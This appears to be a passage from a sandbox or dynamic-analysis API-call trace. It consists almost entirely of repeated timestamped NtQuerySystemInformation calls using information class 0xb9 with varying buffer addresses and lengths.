NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x38, ResultLength=0x0) [0233.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x38, ResultLength=0x0) [0233.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x38, ResultLength=0x0) [0233.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x38, ResultLength=0x0) [0233.725] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.727] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.729] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.730] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x38, ResultLength=0x0) [0233.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d860, Length=0x38, ResultLength=0x0) [0233.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d780, Length=0x38, ResultLength=0x0) [0233.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7d940, Length=0x40, ResultLength=0x0) [0233.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.769] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.779] 